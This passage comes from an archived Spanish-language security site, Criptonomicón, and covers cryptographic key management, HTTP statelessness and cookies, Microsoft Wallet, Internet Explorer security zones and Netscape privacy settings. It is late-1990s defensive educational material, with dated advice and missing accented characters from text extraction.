servicios previamente mencionados. Conviene resaltar que los mecanismos poseen
tres componentes principales:
Una informacin secreta, como claves y contraseas, conocidas por las
entidades autorizadas.
Un conjunto de algoritmos, para llevar a cabo el cifrado, descifrado, hash y
generacin de nmeros aleatorios.
Un conjunto de procedimientos, que definen cmo se usarn los algoritmos,
quin enva qu a quin y cundo.
Asimismo es importante notar que los sistemas de seguridad requieren una gestin de
seguridad. La gestin comprende dos campos bien amplios:
Seguridad en la generacin, localizacin y distribucin de la informacin
secreta, de modo que slo pueda ser accedida por aquellas entidades
autorizadas.
La poltica de los servicios y mecanismos de seguridad para detectar
infracciones de seguridad y emprender acciones correctivas.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/mecanism.html (2 of 2) [25/10/2000 02:31:21 p.m.]

Gestin de claves

Suscripcin gratis

Intimidad?

Gestin de claves

Artculos

Seguridad

Introduccin

Abarca la generacin, distribucin, almacenamiento, tiempo de


vida, destruccin y aplicacin de las claves de acuerdo con una
poltica de seguridad.

Amenazas a la
seguridad

Generacin de claves

Mecanismos de
seguridad

Linux

Navegacin segura

Control de acceso

Servicios de
seguridad

Gestin de claves
La seguridad de un algoritmo descansa en la clave. Un
criptosistema que haga uso de claves criptogrficamente dbiles ser l mismo dbil.
Algunos aspectos a considerar que se presentan a la hora de la eleccin de las claves
son:

CGI

Espacio de claves reducido


Java

JavaScript

Cuando existen restricciones en el nmero de bits de la clave, o bien en la clase de


bytes permitidos (caracteres ASCII, caracteres alfanumricos, imprimibles, etc.), los
ataques de fuerza bruta con hardware especializado o proceso en paralelo pueden
desbaratar en un tiempo razonable estos sistemas.

Cookies

Eleccin pobre de la clave


Crashes

Agujeros

Cuando los usuarios eligen sus claves, la eleccin suele ser muy pobre en general
(por ejemplo, el propio nombre o el de la mujer), hacindolas muy dbiles para un
ataque de fuerza bruta que primero pruebe las claves ms obvias (ataque de
diccionario).

Spam

Claves aleatorias
Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Claves buenas son las cadenas de bits aleatorios generadas por medio de algn
proceso automtico (como una fuente aleatoria fiable o un generador
pseudo-aleatorio criptogrficamente seguro), de forma que si la clave consta de 64
bits, las 264 claves posibles sean igualmente probables. En el caso de los
criptosistemas de clave pblica, el proceso se complica, ya que a menudo las claves
deben verificar ciertas propiedades matemticas (ser primos dos veces seguros,
residuos cuadrticos, etc.).
Frases de paso

file:///C|/TEMP/criptonomicon/criptonomicon/claves.html (1 of 4) [25/10/2000 02:31:22 p.m.]

Gestin de claves
Consejos prcticos

Referencias

Libro de Visitas

Esta solucin al problema de la generacin de contraseas seguras (y fciles de


recordar) por parte del usuario consiste en utilizar una frase suficientemente larga
que posteriormente es convertida en una clave aleatoria por medio de un algoritmo
(key-crunching).

Distribucin de claves
Sin duda alguna, el problema central de todo sistema de gestin de claves lo
constituyen los procedimientos de distribucin de stas. Esta distribucin debe
efectuarse previamente a la comunicacin. Los requisitos especficos en cuanto a
seguridad de esta distribucin dependern de para qu y cmo van a ser utilizadas las
claves. As pues, ser necesario garantizar la identidad de su origen, su integridad y,
en el caso de claves secretas, su confidencialidad.
Las consideraciones ms importantes para un sistema de gestin de claves son el tipo
de ataques que lo amenazan y la arquitectura del sistema. Normalmente, es necesario
que la distribucin de claves se lleve a cabo sobre la misma red de comunicacin
donde se est transmitiendo la informacin a proteger. Esta distribucin es
automtica y la transferencia suele iniciarse con la peticin de clave por parte de una
entidad a un Centro de Distribucin de Claves (intercambio centralizado) o a la otra
entidad involucrada en la comunicacin (intercambio directo). La alternativa es una
distribucin manual (mediante el empleo de correos seguros, por ejemplo),
independiente del canal de comunicacin. Esta ltima alternativa implica un alto
coste econmico y un tiempo relativamente largo para llevarse a cabo, lo que la hace
descartable en la mayora de las situaciones. La distribucin segura de claves sobre
canal inseguro requiere proteccin criptogrfica y, por tanto, la presencia de otras
claves, conformando una jerarqua de claves. En cierto punto se requerir proteccin
no criptogrfica de algunas claves (llamadas maestras), usadas para intercambiar con
los usuarios de forma segura las claves que usarn en su(s) futura(s)
comunicacin(es). Entre las tcnicas y ejemplos no criptogrficos podemos citar
seguridad fsica y confianza.
La distribucin de claves se lleva siempre a cabo mediante protocolos, es decir,
secuencias de pasos de comunicacin (transferencia de mensajes) y pasos de
computacin. Muchas de las propiedades de estos protocolos dependen de la
estructura de los mensajes intercambiados y no de los algoritmos criptogrficos
subyacentes. Por ello, las debilidades de estos protocolos provienen normalmente de
errores cometidos en los niveles ms altos del diseo.
Las claves criptogrficas temporales usadas durante la comunicacin, llamadas
claves de sesin, deben ser generadas de forma aleatoria. Para protegerlas ser
necesaria seguridad fsica o cifrado mediante claves maestras, mientras que para
evitar que sean modificadas deber utilizarse seguridad fsica o autenticacin. La
autenticacin hace uso de parmetros como time-stamps y contadores para protegerse
tambin contra la reactuacin con antiguas claves.

file:///C|/TEMP/criptonomicon/criptonomicon/claves.html (2 of 4) [25/10/2000 02:31:22 p.m.]

Gestin de claves

Almacenamiento de claves
En sistemas con un solo usuario, la solucin ms sencilla pasa por ser su retencin en
la memoria del usuario. Una solucin ms sofisticada y que desde luego funcionar
mejor para claves largas, consiste en almacenarlas en una tarjeta de banda magntica,
en una llave de plstico con un chip ROM (ROM key) o en una tarjeta inteligente, de
manera que el usuario no tenga ms que insertar el dispositivo empleado en alguna
ranura a tal efecto para introducir su clave.
Otra manera de almacenar claves difciles de recordar es en forma encriptada
mediante una clave fcil de recordar, como por ejemplo almacenar en disco la clave
privada RSA cifrada mediante una clave DES.

Tiempo de vida de claves


Una clave nunca debera usarse por tiempo indefinido. Debe tener una fecha de
caducidad, por las siguientes razones:
Cuanto ms tiempo se usa una clave, aumenta la probabilidad de que se
comprometa (la prdida de una clave por medios no criptoanalticos se
denomina compromiso).
Cuanto ms tiempo se usa una clave, mayor ser el dao si la clave se
compromete, ya que toda la informacin protegida con esa clave queda al
descubierto.
Cuanto ms tiempo se usa una clave, mayor ser la tentacin de alguien para
intentar desbaratarla.
En general es ms fcil realizar criptoanlisis con mucho texto cifrado con la
misma clave.
Para protocolos orientados a conexin, una eleccin obvia es usar la misma clave de
sesin durante la duracin de la comunicacin, siendo descartada al finalizar la
comunicacin y nunca reutilizada. Si la conexin lgica posee una vida muy larga,
sera prudente en este caso cambiar la clave de sesin peridicamente, por ejemplo
cada vez que el nmero de secuencia de la PDU completa un ciclo.
Para protocolos no orientados a conexin, no existe un inicio o fin de sesin
explcitos. Por lo tanto, no resulta tan obvio con qu frecuencia debera cambiarse la
clave. Con el fin de no recargar la informacin de control ni retrasar la transaccin,
una estrategia vlida sera usar una clave de sesin durante un cierto perodo o para
un cierto nmero de transacciones.
Las claves maestras no necesitan ser reemplazadas tan frecuentemente, ya que se
usan ocasionalmente para el intercambio de claves. En cualquier caso, no hay que
olvidar que si una clave maestra se compromete, la prdida potencial es enorme, de
hecho, todas las comunicaciones cifradas con claves intercambiadas con esa clave
maestra.
En el caso del cifrado de grandes ficheros de datos, una solucin econmica y segura,
file:///C|/TEMP/criptonomicon/criptonomicon/claves.html (3 of 4) [25/10/2000 02:31:22 p.m.]

Gestin de claves

mejor que andar descifrando y volviendo a cifrar los ficheros con una nueva clave
todos los das, sera cifrar cada fichero con una nica clave y despus cifrar todas las
claves con una clave maestra, que deber ser almacenada en un lugar de alta
seguridad, ya que su prdida o compromiso echara a perder la confidencialidad de
todos los ficheros.

Destruccin de claves
Las claves caducadas deben ser destruidas con la mayor seguridad, de modo que no
caigan en manos de un adversario, puesto que con ellas podra leer los mensajes
antiguos. En el caso de haber sido escritas en papel, ste deber ser debidamente
destruido; si haban sido grabadas en una EEPROM, deber sobreescribirse mltiples
veces, y si se encontraba en EPROM, PROM o tarjeta de banda magntica, debern
ser hechas aicos (muy pequeitos, a poder ser). En funcin del dispositivo
empleado, deber buscarse la forma de que se vuelvan irrecuperables.
Las ideas de esta seccin sobre gestin de claves han sido extradas del libro "Applied Cryptography", por Bruce Schneier.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

file:///C|/TEMP/criptonomicon/criptonomicon/claves.html (4 of 4) [25/10/2000 02:31:22 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/amenazas.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/amenazas.gif [25/10/2000 02:31:22 p.m.]

Cookies - Telas de araa y otros bichos

Suscripcin gratis

"Entra en mi estancia", le dijo la araa a la mosca

Intimidad?

Sobre telas de araa y otros bichos


Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Si miras a la ventanita de tu navegador donde dice direccin,


vers que sta empieza por http://. Estas letras le indican al
servidor de Red la manera como quieres comunicarte con l, es
Sencillo cliente de
HTTP
decir, el protocolo que se va a usar, para que tu mquina y la suya
se puedan entender. En el caso de la Tela de Araa Mundial (WWW), el protocolo
empleado es el HTTP. Se trata de un protocolo sin estado, lo que significa que, en
principio, un servidor de HTTP carece de medios para relacionar informacin
concerniente a una peticin con otra peticin anterior o posterior. Los datos de la
respuesta se basan exclusivamente en la informacin que el cliente enva en la
peticin. El protocolo HTTP no conoce a la persona a quien est enviando una
pgina ni cuntas pginas le haya podido enviar, incluso aunque nos hayamos
conectado hace escasamente algunos segundos, ya que cada peticin de pgina se
procesa independientemente.
Este es un rasgo diferenciador del HTTP con respecto a otros protocolos igualmente
conocidos, que son con estado, es decir, que pueden utilizar la informacin de una
peticin para modificar peticiones futuras. En la prctica, estos protocolos operan
sobre el concepto de sesin, durante la cual se enva y recibe un lote de peticiones y
respuestas, mientras que para HTTP la sesin se reduce a una sola pgina. Algunos
con los que posiblemente ests familiarizado son el FTP (Protocolo de Transferencia
de Ficheros), que posee muchos estados, como el directorio actual; el SMTP
(Protocolo de Transferencia de Mensajes Sencillo) y el POP (Protocolo de Oficina
Postal), que incluyen entre sus estados la identidad del usuario; NNTP (Protocolo de
Transferencia de Noticias en Red), que permite por ejemplo cambiar el grupo de
usenet para dirigir peticiones futuras de artculos, etc.
La ventaja de los protocolos que no guardan el estado de la comunicacin es que se
requiere menor nmero de recursos por parte del servidor, mientras que se exigen en
cambio en el lado del cliente. Sin embargo, su desventaja es que el cliente necesita
comunicar al servidor informacin suficiente en cada peticin para poder recibir la
respuesta correcta en cada caso. En este contexto, las cookies constituyen una
herramienta para que el servidor pueda solicitar al cliente que almacene cualquier
informacin arbitraria para su uso en conexiones futuras, es decir, el servidor le pide
al cliente que sea l quien almacene informacin de estado, de manera que en la
prxima sesin no sea considerado como un extrao.
Este sencillo mecanismo proporciona un poderoso aliado que abre las puertas a una

file:///C|/TEMP/criptonomicon/criptonomicon/telas.html (1 of 2) [25/10/2000 02:31:23 p.m.]

Cookies - Telas de araa y otros bichos


Consejos prcticos

Referencias

Libro de Visitas

gran variedad de aplicaciones que sean escritas para entornos basados en la Web. Las
aplicaciones de compra por Internet pueden as almacenar informacin como los
artculos seleccionados, los servicios de pago pueden reenviar la informacin de
registro y as liberar al cliente de reescribir el login y password la prxima vez que se
conecte, los sitios pueden guardar las preferencias de cada usuario en el propio
cliente y hacer que el cliente suministre esas preferencias cada vez que se conecte a
ese sitio.
Volver a la Pgina anterior.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/telas.html (2 of 2) [25/10/2000 02:31:23 p.m.]

Sencillo cliente Web en Java

Sencillo cliente de HTTP


Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

En esta pequea applet de Java se ofrece la posibilidad de conectarse al servidor


desde el que se ha recibido la applet y solicitarle que nos enve una pgina web
determinada. Para ello, en la casilla de URL debemos escribir la direccin completa,
incluyendo http:// del resurso que queremos recuperar. En la ventana inferior
aparecern todos los pasos del protocolo.
Si quieres ver cmo funciona este sencillo cliente, tendrs que activar Java.
Como se puede observar, tan pronto el servidor nos enva el fichero solicitado, rompe
la conexin. Si queremos recuperar otro o el mismo fichero, se establecer de nuevo
una sesin con el servidor, ponindose de manifiesto que el protocolo HTTP es sin
estados, es decir, no se conserva ninguna informacin sobre sesiones entre peticiones
sucesivas, de ah la creacin de mecanismos como las cookies, para permitir el
"recordar" lo que ocurri de una peticin a la siguiente.
Volver a la pgina sobre HTTP.

Control de acceso

CGI

Java

JavaScript

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/clienteweb.html (1 of 2) [25/10/2000 02:31:23 p.m.]

Sencillo cliente Web en Java


Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/clienteweb.html (2 of 2) [25/10/2000 02:31:23 p.m.]

Microsoft Wallet

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Microsoft Wallet
Qu es Microsoft Wallet?
Con Microsoft Wallet 3.0 puede almacenar en su PC informacin
sobre la direccin y el mtodo de pago que utilizar en las
transacciones de compra en lnea. Puede considerar Microsoft
Wallet como el equivalente electrnico de la cartera que
posiblemente lleve consigo en el bolso o en un bolsillo para
transportar las tarjetas de crdito y su identificacin.

General
Seguridad
Contenido
Conexin
Programas

Opciones avanzadas
Microsoft Wallet facilita las compras en Internet al permitirle
especificar la direccin y el mtodo de pago una nica vez. A
partir de entonces, esa informacin queda almacenada en el equipo y podr
transmitirla a tiendas de Internet compatibles con Wallet cuando se le solicite la
direccin de envo o los datos de la tarjeta de crdito al realizar alguna compra. No es
necesario volver a escribir esta informacin cada vez que realice una compra, como
tendra que hacer en las tiendas que utilizan los mtodos tradicionales. Para enviar o
cargar compras a diferentes ubicaciones (por ejemplo, a casa o a la oficina), puede
almacenar fcilmente estas direcciones diferentes en Wallet y seleccionar una de
ellas durante el proceso de compra utilizando un nombre sencillo, como "Casa de
Juan". Si dispone de varias tarjetas de crdito, puede introducirlas y almacenarlas con
un nombre descriptivo, como "Visa de Mara".

Adems de comodidad, Wallet proporciona seguridad para proteger la informacin


de pago. La informacin especificada (como los tipos, nmeros y fechas de
expiracin de las tarjetas de crdito) se almacena de forma segura en el equipo. Es
posible definir una contrasea exclusiva para cada mtodo de pago almacenado, de
modo que slo usted pueda utilizarlo. A continuacin, cuando realice compras en un
sitio compatible con Wallet, durante el proceso de compra lo nico que tendr que
hacer es seleccionar la tarjeta apropiada y escribir la contrasea para pagar las
compras efectuadas en lnea.
Wallet consta de dos interfaces independientes: Address Manager y Payment
Manager. Utilice Address Manager para introducir, almacenar y tener acceso a
file:///C|/TEMP/criptonomicon/criptonomicon/navegador/wallet.html (1 of 3) [25/10/2000 02:31:24 p.m.]

Microsoft Wallet

direcciones a las que enviar y facturar un pedido en lnea. Los nombres, direcciones
de correo electrnico y nmeros de telfono de los usuarios de Wallet pueden verse
en la Libreta de direcciones.
Utilice Payment Manager para introducir, almacenar de forma segura y tener acceso
a diversos tipos de mtodos de pago para abonar las compras en lnea. Esta
informacin est protegida por una contrasea definida por el usuario. Al comprar en
una tienda de Internet compatible con Microsoft Wallet, el sitio puede pedirle que
seleccione los mtodos de pago almacenados en Wallet y que autorice el pago
mediante la introduccin de la contrasea.

Trabajar con Microsoft Wallet


Para tener acceso a Address Manager y a Payment Manager de Microsoft Wallet,
siga estos pasos:
1. En Internet Explorer, haga clic en el men Ver.
2. En el men Ver, haga clic en el comando Opciones de Internet.
3. En la ficha Contenido, haga clic en el botn Direcciones para trabajar con la
informacin de direcciones o bien haga clic en el botn Pagos para trabajar
con mtodos de pago e informacin relacionada. En el cuadro de dilogo que
aparecer, haga clic en Agregar para crear una entrada nueva, haga clic en
Editar para cambiar una entrada existente o haga clic en Eliminar para quitar
una entrada.
Una vez almacenada la informacin de pago y las direcciones en Wallet, esa
informacin podr transmitirse durante el proceso de compra en lnea a cualquier
sitio web de compras que sea compatible con Wallet.

La seguridad en Microsoft Wallet


Toda la informacin privada contenida en Microsoft Wallet, como nmeros de tarjeta
de crdito, est almacenada en su propio ordenador de forma cifrada. Cada tarjeta de
crdito que guarde en Wallet est protegida con su propia contrasea separada. Sin la
contrasea, alguien que utilice su ordenador sin autorizacin no podr obtener la
informacin de su tarjeta de crdito ni podr utilizarla para efectuar compras por
Internet. De hecho, si pierde u olvida su contrasea, deber introducir de nuevo toda
la informacin de la tarjeta.
La seguridad mientras transmite la informacin de Wallet al comerciante es funcin
del protocolo que ste utilice. La mayora de los comercios en lnea confan en SSL
para comunicarse con los clientes. En este caso, el nmero de tarjeta de crdito se
extrae en claro de Wallet (sin cifrar) y es cifrado por el navegador utilizando cifrado
del canal con SSL. Desgraciadamente, fuera de Norteamrica, se utiliza SSL con 40
bits de longitud de clave, claramente insuficiente para ofrecer garantas de seguridad.
Algunos comerciantes estn empezando a utilizar el protocolo SET para procesar de
forma integrada el pago. En este caso, la informacin de pago se cifra antes de ser
file:///C|/TEMP/criptonomicon/criptonomicon/navegador/wallet.html (2 of 3) [25/10/2000 02:31:24 p.m.]

Microsoft Wallet

enviada, de manera que slo el banco del comerciante puede leerla, quedando
inaccesible incluso para el propio comerciante. Microsoft se encuentra actualmente
desarrollando una extensin para Microsoft Wallet que soporte el protocolo SET.
Nota: en Windows NT, Microsoft Wallet necesita privilegios de administrador tanto para su
instalacin como para su uso. Para permitir que Wallet funcione mientras se encuentra conectado
como un usuario distinto de administrador, debe aadir la cuenta de usuario al grupo de
administradores de la mquina local.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/wallet.html (3 of 3) [25/10/2000 02:31:24 p.m.]

Zonas de seguridad de Internet Explorer

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Zonas de seguridad de Internet Explorer


Direcciones que no requieren un servidor proxy. Las
direcciones incluidas en esta zona las define el administrador
Zona intranet local
del sistema en el Internet Explorer Administrator's Kit (IEAK).
El nivel de seguridad por defecto para esta zona es Bajo.
Sitios en los que se confa lo suficiente como para requerir un
Zona de sitios en los nivel de seguridad bajo antes de descargar o ejecutar
que se confa
programas desde Internet. Se pueden asignar sitios a esta zona.
Por defecto, el nivel de seguridad es Bajo.
Sitios en los que no se confa, requiriendo para ellos un nivel
Zona de sitios
de seguridad medio o alto antes de descargar o ejecutar
restringidos
programas desde Internet. Por defecto, el nivel de seguridad es
Alto.
Esta es la zona por defecto para todos los usuarios. Se
considera como Internet cualquier cosa que no est en el
Zona de internet
ordenador, en la intranet o en los sitios de las zonas anteriores.
No puede agregar sitios Web a esta zona. Por defecto, el nivel
de seguridad es Medio.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/zonas.html [25/10/2000 02:31:24 p.m.]

Niveles de seguridad para las zonas

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Nieveles de seguridad para las zonas


Alto

Medio

Bajo

Personalizar

Evita de manera automtica la descarga y ejecucin de


prcticamente todo tipo de contenido activo, incluyendo descargas
de ficheros. Esta es la opcin recomendada para mxima
seguridad. Algunos usuarios, no obstante, lo pueden encontrar
excesivamente restrictivo.
Pide a los usuarios confirmacin antes de descargar o ejecutar
contenido potencialmente peligroso. Esta opcin se recomienda
como el mejor compromiso entre la seguridad y la conveniencia.
Slo pide confirmacin antes de descargar o ejecutar controles
ActiveX sin firmar. Cualquier otro contenido activo se ejecuta sin
previo aviso. No se recomienda esta opcin.
Permite personalizar las restricciones que se aplicarn al contenido
activo. Esta opcin slo se recomienda para usuarios expertos que
conozcan a fondo el funcionamiento del contenido activo.

Copyright 1997-1999 Gonzalo lvarez Maran. Todos los derechos reservados.


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/niveles.html [25/10/2000 02:31:24 p.m.]

file:///C|/TEMP/criptonomicon/criptonomicon/images/mseguridad.gif

file:///C|/TEMP/criptonomicon/criptonomicon/images/mseguridad.gif [25/10/2000 02:31:25 p.m.]

Configuracin segura de Netscape Communicator

Obtener un navegador vlido


Configuracin segura de
Netscape Communicator
Configuracin segura de
Internet Explorer

Configuracin segura de las Preferencias


El recorrido por las opciones de seguridad de Netscape
Communicator comenzar por la configuracin de las
preferencias. Para ello, se acude al men de Edicin y cuando se
despliegue, se pulsa el comando Preferencias.... Las
opciones seleccionadas se salvan en un archivo localizado en su
directorio personal dentro de Netscape. Por ejemplo, una
localizacin tpica sera C:\Archivos de
programa\Netscape\Users\gonzalo\prefs.js.

Preferencias
Informacin de
seguridad
Netwatch

Carpeta Navigator
En la carpeta Navigator se ofrece la posibilidad de configurar el nmero de das
que las pginas web visitadas aparecern listadas en la ventana de historial. Esta
ventana contiene el URL o direccin de todas las pginas que se han visitado durante
el nmero de das especificado. En el caso de formularios, aparecer incluso el
contenido que se escribi en ellos. En otras palabras, cualquier persona que accediera
a esta informacin sabra qu pginas han sido visitadas, cundo y, en el caso de los
formularios, qu datos se le proporcionaron. Desgraciadamente, errores de seguridad
en este navegador, permiten a cualquier sitio de Internet obtener esta informacin de
los usuarios que lo visiten. Si no quiere que caigan en otras manos, debe establecer a
cero los das. Puede asimismo hacer la siguiente prueba: escriba
about:global
en la ventana de direccin y compruebe cmo aparece en la ventana del navegador la
lista completa de los ltimos sitios que ha visitado. Observe cmo si rellen algn
formulario, tambin aparecern los datos suministrados (siempre y cuando el mtodo
de envo de datos del formulario fuera GET).
En la versin 4.5 aparece adems la opcin de limpiar el contenido de la barra de
direccin (los sitios que aparecen en una lista desplegable al pulsar la flecha de la
derecha). Al igual que en el caso anterior, se muestran las direcciones de las pginas
ms recientemente visitadas, con la posibilidad de que cualquiera que se siente a

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/preferencias.html (1 of 5) [25/10/2000 02:31:25 p.m.]

Configuracin segura de Netscape Communicator

continuacin las vea, sabiendo qu sitios visit recientemente.


Bajo la opcin de Aplicaciones se puede especificar qu aplicaciones de ayuda y
plug-ins se lanzarn en respuesta a la carga de ficheros con una extensin
determinada y un tipo MIME asociado que el navegador no puede visualizar
directamente. As, por ejemplo, si al navegar por una pgina web encuentra un enlace
a un documento Word, cuya extensin es .doc, al seguir el enlace se arrancar
Microsoft Word, si as aparece configurado en la ventana de aplicaciones. Esta
caracterstica permite que el navegador sea capaz de visualizar directamente
documentos en PDF, archivos de sonido o de vdeo, etc. Tanto las aplicaciones de
ayuda como los plug-ins son programas en cdigo nativo con acceso total a los
recursos del sistema, por lo que conviene instalarlos con precaucin, ya que si alguno
estuviera escrito con malas intenciones podra causar daos irreparables. De hecho,
se han producido ataques gracias a plug-ins maliciosos (lea la escalofriante historia
de las Estafas telefnicas a travs de la pornografa en Internet). Otros plug-ins, sin
estar especficamente diseados para perjudicar al navegante, contenan agujeros de
seguridad que permitan obtener informacin de su sistema, como ocurri en 1997
con el plug-in de ShockWave de Macromedia, que permita a un servidor web
obtener ficheros del disco duro del visitante. Por otro lado, una pgina maliciosa
podra tambin utilizar documentos que contuvieran virus de macro, como ha
ocurrido en Word y Excel, para hacer que el usuario incauto los ejecutara en su
ordenador. Como medida cautelar, se debe instalar el menor nmero posible de
plug-ins y aplicaciones de ayuda y siempre de casas conocidas en las que se puede
confiar. Para los tipos de archivo que se consideren potencialmente portadores de
virus o con capacidad de interpretar comandos, se debe especificar que el navegador
pida confirmacin antes de abrirlos. Para ello, se selecciona el tipo de documento,
por ejemplo "Microsoft Excel Worksheet" y se aprieta el botn de Editar... en la
ventana que aparece. En la nueva ventana se selecciona la opcin de avisar antes de
abrir documentos de este tipo. Puede comprobar qu plug-ins tiene instalados
escribiendo en la ventana de direccin:
about:plugins
Es muy probable que se sorprenda de la cantidad de plug-ins que posee, sin ser
consciente de ello. Quin los puso ah? Usted, cuando instal otros programas, que a
lo mejor en algn momento de la instalacin le interrogaron acerca de su deseo de
aadir un programa para su integracin con el navegador.

Carpeta Correo y Grupos


Existen ciertos aspectos con relacin al correo que conviene tener en cuenta a la hora
de proteger la intimidad. El primero de ellos y uno de los ms importantes concierne
a la identidad del usuario. En la opcin Identidad se puede especificar el nombre
y direccin de correo del usuario, entre otros datos. Si se utiliza Netscape como
cliente de correo, evidentemente estos datos deben ser ciertos para poder enviar y
recibir mensajes. Sin embargo, existen tcnicas que permiten obligar al visitante de
una pgina a enviar un correo sin que se d cuenta, por el mero hecho de pasar el
file:///C|/TEMP/criptonomicon/criptonomicon/navegador/preferencias.html (2 of 5) [25/10/2000 02:31:25 p.m.]

Configuracin segura de Netscape Communicator

ratn sobre una imagen o cargar una pgina (es interesante la visita a la pgina de
envo de correo para un ilustrativo ejemplo de esta posibilidad). En este caso, se
enviar el correo con la direccin y nombre introducido en esta ventana. En las
versiones de Communicator 4.x, antes de enviar el correo se le pide confirmacin al
usuario, pero son muchos los usuarios que bien porque han adquirido el hbito de
decir que s a todo, bien porque no entienden o no leen el contenido de la ventana de
confirmacin, lo cierto es que envan su direccin indiscriminadamente. Siempre se
debe leer atentamente cada ventana que aparece antes de emprender acciones que
puedan comprometer la seguridad. Algunos usuarios introducen datos falsos, lo cual
puede ser una buena idea para contrarrestar el problema anterior, si bien no lo es
tanto para falsificar correos, ya que quedar un rastro debido a la direccin IP de la
mquina desde la que se enviaron. No obstante, puede servir para engaar en un
primer momento a un usuario poco observador.
La opcin Servidor de correo permite determinar el lugar del disco duro
donde se almacenar todo el correo recibido, enviado, borrado, etc. Normalmente,
existe un lugar por defecto que conviene cambiar, ya que existen muchos agujeros en
los navegadores que facilitan a sitios web remotos el examen del contenido de
archivos en el disco duro cuyo nombre y localizacin se conocen. Si uno no se
molesta en cambiar el lugar donde se guarda todo el correo, cualquier servidor web
que se interese en ello puede leerlo, tanto el enviado como el recibido. No cuesta
nada cambiar la localizacin por defecto a otro lugar en el disco duro y aadir
seguridad. Tambin se ofrece la posibilidad de guardar la contrasea de acceso al
servidor de correo. Piense que si activa esta casilla, cualquier persona con acceso a su
navegador podr leer los futuros correos que reciba mientras usted no est presente,
mientras que en caso contrario, se le pedir la contrasea cada vez que inicia una
nueva sesin con el servidor.
En la opcin Mensajes en las versiones 4.0x y Copias y carpetas en 4.5, se
ofrece la posibilidad de enviar a terceras personas copias de los correos mandados al
exterior. Conviene tener presente que si se utiliza Netscape desde el trabajo, el jefe
puede haber introducido ah su direccin de correo para recibir una copia de cada
mensaje enviado y asegurarse as del buen uso de Internet que hacen sus empleados
en horas laborales.
Tambin existe la posibilidad de especificar dnde se almacenarn los correos
enviados, si es que se quieren guardar en disco. Nunca hay que perder de vista el
hecho de que en sistemas Windows, siempre que no se utilice alguna herramienta de
cifrado, cualquiera puede acceder al contenido del disco duro, por lo que se podra
leer el contenido de los correos. Si no se cambia el directorio por defecto donde se
almacenan, como se ha explicado anteriormente, entonces no slo las personas con
acceso fsico al ordenador, sino cualquier mquina conectada a Internet podra leerlos
explotando algunos de los agujeros del navegador.

Carpeta Avanzadas
Por defecto, Java y JavaScript aparecen activados tras la instalacin del programa. Si

file:///C|/TEMP/criptonomicon/criptonomicon/navegador/preferencias.html (3 of 5) [25/10/2000 02:31:25 p.m.]

Configuracin segura de Netscape Communicator

no ha modificado la configuracin de su navegador, puede comprobar cmo las


casillas se encuentran activadas. Java y JavaScript son lenguajes de programacin
que aaden inteligencia y realzan el contenido de las pginas web. Hoy en da, son
pocas las pginas que no hacen uso de una u otra forma de programacin. Por
desgracia, la gran mayora de agujeros de seguridad que se han descubierto en
Netscape estn directamente relacionados con la forma de implantarse estos
lenguajes en el navegador. En espera de parches o nuevas versiones mejoradas, el
consejo habitual para los navegantes es que se desactive Java y JavaScript como
medida preventiva. Si alguien se siente amenazado, lo puede hacer desactivando las
casillas anteriores.
En la ventana aparece tambin la opcin de enviar la direccin de correo como
contrasea de FTP. El protocolo de transferencia de ficheros (FTP) se utiliza para
transferir ficheros voluminosos a travs de Internet. Normalmente se accede a
